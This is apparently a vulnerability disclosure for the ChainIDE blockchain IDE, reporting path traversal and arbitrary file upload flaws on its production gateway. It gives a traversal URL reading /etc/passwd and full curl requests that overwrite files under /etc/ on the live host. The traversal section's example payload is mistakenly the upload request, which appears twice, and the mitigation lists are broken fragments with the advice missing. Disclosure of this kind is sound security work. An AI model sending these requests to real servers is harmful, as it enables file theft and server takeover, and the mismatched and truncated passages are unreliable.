ChainIDE is a multichain integrated development environment (IDE) designed specifically for blockchain development. It provides a comprehensive platform where developers can write, test, and deploy smart contracts across multiple blockchain platforms. ChainIDE offers a user-friendly interface and a range of powerful features to streamline the blockchain development process.
- https://gateway.chainide.com
- https://prod-api.chainide.com
[CWE-22] - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
An insecure direct object reference vulnerability (CWE-22) was found in the ChainIDE application. Attackers can read arbitrary files by exploiting the getFileContent
function, potentially leading to information disclosure and system compromise.
[CWE-434] - Unrestricted Upload of File with Dangerous Type
ChainIDE has an arbitrary file upload vulnerability (CWE-434), allowing attackers to replace any file on the server. This can result in severe consequences such as remote code execution or data loss.
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') - CWE-22
1.
Send an HTTP GET request to the following endpoint: https://gateway.chainide.com/fs/getFileContent?workspaceId=9d0e5420c81d4668b2c2166e0a5b0d7e&filePath=../../../../../../../../../../etc/passwd
2. Observe that the response contains the content of the /etc/passwd file, demonstrating a successful directory traversal attack.
E.g. payload:
curl -i -s -k -X $'POST' \
-H $'Host: gateway.chainide.com' -H $'User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.87 Safari/537.36' -H $'Accept: application/json' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Referer: https://chainide.com/' -H $'Content-Type: multipart/form-data; boundary=---------------------------3463358912962721071098813171' -H $'Content-Length: 750' -H $'Origin: https://chainide.com' -H $'Dnt: 1' -H $'Sec-Fetch-Dest: empty' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Site: same-site' -H $'Sec-Ch-Ua-Platform: \"Windows\"' -H $'Sec-Ch-Ua: \"Google Chrome\";v=\"98\", \"Chromium\";v=\"98\", \"Not=A?Brand\";v=\"24\"' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'Te: trailers' \
-b $'amplitude_id_96b7e77d36a5b1889ae8b6f8d3d8c27fchainide.com=eyJkZXZpY2VJZCI6ImU2ODVhYTQ5LWZjYWQtNDg5Yi1iN2UzLTliYmY4NmYzNGU3Y1IiLCJ1c2VySWQiOm51bGwsIm9wdE91dCI6ZmFsc2UsInNlc3Npb25JZCI6MTY4NTMzMzMzMjA5MiwibGFzdEV2ZW50VGltZSI6MTY4NTMzMzU1MzU2OCwiZXZlbnRJZCI6OSwiaWRlbnRpZnlJZCI6MCwic2VxdWVuY2VOdW1iZXIiOjl9' \
--data-binary $'-----------------------------3463358912962721071098813171\x0d\x0aContent-Disposition: form-data; name=\"workspaceId\"\x0d\x0a\x0d\x0a9d0e5420c81d4668b2c2166e0a5b0d7e\x0d\x0a-----------------------------3463358912962721071098813171\x0d\x0aContent-Disposition: form-data; name=\"filePath\"\x0d\x0a\x0d\x0a../../../../../../../../etc/\x0d\x0a-----------------------------3463358912962721071098813171\x0d\x0aContent-Disposition: form-data; name=\"overwrite\"\x0d\x0a\x0d\x0atrue\x0d\x0a-----------------------------3463358912962721071098813171\x0d\x0aContent-Disposition: form-data; name=\"file\"; filename=\"test.html\"\x0d\x0aContent-Type: text/plain\x0d\x0a\x0d\x0ahello Word\x0d\x0a-----------------------------3463358912962721071098813171\x0d\x0aContent-Disposition: form-data; name=\"mTime\"\x0d\x0a\x0d\x0a1685301153\x0d\x0a-----------------------------3463358912962721071098813171--\x0d\x0a' \
$'https://gateway.chainide.com/fs/upload'
Arbitrary File Write - CWE-434
1. Send an HTTP POST request to the following endpoint: `https://gateway.chainide.com/fs/upload` (Include the necessary request headers and multipart/form-data payload to upload a file.)
2. Observe that the file is successfully uploaded, demonstrating a successful arbitrary file write vulnerability.
E.g. payload:
curl -i -s -k -X $'POST' \
-H $'Host: gateway.chainide.com' -H $'User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.87 Safari/537.36' -H $'Accept: application/json' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Referer: https://chainide.com/' -H $'Content-Type: multipart/form-data; boundary=---------------------------3463358912962721071098813171' -H $'Content-Length: 750' -H $'Origin: https://chainide.com' -H $'Dnt: 1' -H $'Sec-Fetch-Dest: empty' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Site: same-site' -H $'Sec-Ch-Ua-Platform: \"Windows\"' -H $'Sec-Ch-Ua: \"Google Chrome\";v=\"98\", \"Chromium\";v=\"98\", \"Not=A?Brand\";v=\"24\"' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'Te: trailers' \
-b $'amplitude_id_96b7e77d36a5b1889ae8b6f8d3d8c27fchainide.com=eyJkZXZpY2VJZCI6ImU2ODVhYTQ5LWZjYWQtNDg5Yi1iN2UzLTliYmY4NmYzNGU3Y1IiLCJ1c2VySWQiOm51bGwsIm9wdE91dCI6ZmFsc2UsInNlc3Npb25JZCI6MTY4NTMzMzMzMjA5MiwibGFzdEV2ZW50VGltZSI6MTY4NTMzMzU1MzU2OCwiZXZlbnRJZCI6OSwiaWRlbnRpZnlJZCI6MCwic2VxdWVuY2VOdW1iZXIiOjl9' \
--data-binary $'-----------------------------3463358912962721071098813171\x0d\x0aContent-Disposition: form-data; name=\"workspaceId\"\x0d\x0a\x0d\x0a9d0e5420c81d4668b2c2166e0a5b0d7e\x0d\x0a-----------------------------3463358912962721071098813171\x0d\x0aContent-Disposition: form-data; name=\"filePath\"\x0d\x0a\x0d\x0a../../../../../../../../etc/\x0d\x0a-----------------------------3463358912962721071098813171\x0d\x0aContent-Disposition: form-data; name=\"overwrite\"\x0d\x0a\x0d\x0atrue\x0d\x0a-----------------------------3463358912962721071098813171\x0d\x0aContent-Disposition: form-data; name=\"file\"; filename=\"test.html\"\x0d\x0aContent-Type: text/plain\x0d\x0a\x0d\x0ahello Word\x0d\x0a-----------------------------3463358912962721071098813171\x0d\x0aContent-Disposition: form-data; name=\"mTime\"\x0d\x0a\x0d\x0a1685301153\x0d\x0a-----------------------------3463358912962721071098813171--\x0d\x0a' \
$'https://gateway.chainide.com/fs/upload'
Vulnerability #1: Directory Traversal Attack
To mitigate the directory traversal attack vulnerability (CWE-22), the following measures are recommended:
../
" or "..
". Ensure that the requested file paths are limited to the intended directories.Vulnerability #2: Arbitrary File Write
To address the arbitrary file write vulnerability (CWE-434), the following measures are recommended: